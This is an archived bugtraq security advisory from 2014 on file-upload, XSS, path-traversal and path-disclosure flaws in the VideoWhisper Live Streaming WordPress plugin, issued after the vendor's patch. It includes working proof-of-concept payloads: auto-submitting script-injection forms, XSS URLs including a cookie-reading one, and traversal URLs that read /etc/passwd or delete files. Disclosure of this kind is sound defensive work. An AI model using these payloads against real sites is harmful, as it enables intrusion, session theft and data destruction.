[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin
From: High-Tech Bridge Security Research <advisory () htbridge ! com>
Date: 2014-02-27 12:13:56
Message-ID: 20140227121356.558922C5F88D () htbridge ! ch
[Download RAW message or body]
Advisory ID: HTB23199
Product: VideoWhisper Live Streaming Integration
Vendor: VideoWhisper
Vulnerable Version(s): 4.27.3 and probably prior
Tested Version: 4.27.3
Advisory Publication: February 6, 2014 [without technical details]
Vendor Notification: February 6, 2014
Vendor Patch: February 7, 2014
Public Disclosure: February 27, 2014
Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], \
Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through \
Externally-Generated Error Message [CWE-211] CVE References: CVE-2014-1905, \
CVE-2014-1906, CVE-2014-1907, CVE-2014-1908 Risk Level: Critical
CVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), \
5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) Solution Status: Fixed \
by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in \
VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary \
code on the target system, gain access to potentially sensitive data, perform \
Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete \
arbitrary files.
1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905
VideoWhisper Live Streaming Integration does not properly verify malicious file \
extensions before uploading files to the server in \
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php". A \
remote attacker can upload and execute arbitrary PHP file on the target system.
The following PoC code demonstrates exploitation of the vulnerability:
After successful exploitation the remote shell will be accessible via the following \
URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg
Successful exploitation of this vulnerability requires that the webserver is not \
configured to handle the mime-type for media files with .jpg extension.
2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: \
CVE-2014-1906
2.1 The vulnerability exists due to insufficient filtration of "m" HTTP POST \
parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" \
script. A remote attacker can send a specially crafted HTTP POST request to the \
vulnerable script and permanently inject and execute arbitrary html and script code \
in browser in context of the vulnerable website when user visits a page with enabled \
plugin's widget. The script will be also executed in administrative section on the \
following page:
http://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live
The exploitation examples below use the "alert()" JavaScript function to display \
"immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" \
method="post"> <input type="hidden" name="s" value="1">
<input type="hidden" name="u" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="m" value="<script>alert('immuniweb')</script>">
</form>
</body>
2.2 The vulnerability exists due to insufficient filtration of "msg" HTTP POST \
parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" \
script. A remote attacker can send a specially crafted HTTP POST request to the \
vulnerable script and permanently inject and execute arbitrary html and script code \
in browser in context of the vulnerable website when user visits the affected page.
The exploitation examples below use the "alert()" JavaScript function to display \
"immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" \
method="post"> <input type="hidden" name="msg" \
value="<script>alert('immuniweb')</script>"> <input type="hidden" name="r" value="1">
</form>
</body>
The code will be executed when the user visits the following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html \
Where [room] is set by HTTP POST parameter r and [date] is the current date.
2.3 The vulnerabilities exist due to insufficient filtration of "n" HTTP GET \
parameter passed to scripts "channel.php", "htmlchat.php", "video.php" and \
"videotext.php" within the \
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/" directory. A remote \
attacker can send a specially crafted HTTP GET request to vulnerable scripts and \
execute arbitrary HTML and script code in browser in context of the vulnerable \
website.
The exploitation examples below use the "alert()" JavaScript function to display \
"immuniweb" word:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
2.4 The vulnerability exists due to insufficient filtration of "message" HTTP GET \
parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php" \
script. A remote attacker can trick a user to open a specially crafted link and \
execute arbitrary HTML and script code in browser in context of the vulnerable \
website.
The exploitation example below uses the "alert()" JavaScript function to display \
"immuniweb" word:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
2.5 The vulnerability exists due to insufficient filtration of "ct" HTTP POST \
parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" \
script. A remote attacker can trick a logged-in user to open a specially crafted link \
and execute arbitrary HTML and script code in browser in context of the vulnerable \
website.
The exploitation example below uses the "alert()" JavaScript function to display \
"immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" \
method="post"> <input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
2.6 The vulnerability exists due to insufficient filtration of "ct" HTTP POST \
parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" \
script. A remote attacker can trick a user to open a specially crafted link and \
execute arbitrary HTML and script code in browser in context of the vulnerable \
website.
The exploitation example below uses the "alert()" JavaScript function to display \
"immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" \
method="post"> <input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907
3.1 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter \
in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php" \
script. A remote attacker can view contents of arbitrary files on the target system \
using directory traversal sequences.
The exploitation example below displays contents of "/etc/passwd" file:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd
3.2 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter \
in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php" \
script. A remote attacker can delete arbitrary files on the target system using \
directory traversal sequences.
The exploitation example below deletes a file "/tmp/immuniweb":
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb
Successful exploitation of this vulnerability requires that file "/tmp/immuniweb" \
exists on the system.
4) Information Exposure Through Externally-generated Error Message in VideoWhisper \
Live Streaming Integration: CVE-2014-1908
4.1 The vulnerability exists due to improper implementation of error handling \
mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP \
GET request to vulnerable scripts and gain knowledge of full installation path of the \
application.
The following URL can be used to gain knowledge of full installation path of the \
application:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php
-----------------------------------------------------------------------------------------------
Solution:
Update to VideoWhisper Live Streaming Integration version 4.29.5
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - \
Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for \
WordPress. [2] VideoWhisper Live Streaming Integration - \
http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The \
VideoWhisper Live Streaming software can easily be used to add video broadcasting \
features to WordPress sites and live video streams on blog pages. [3] Common \
Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope \
and free for public use, CVE ® is a dictionary of publicly known information security \
vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - \
http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a \
formal list of software weakness types. [5] ImmuniWeb ® - \
http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web \
application security assessment solution with SaaS delivery model that combines \
manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic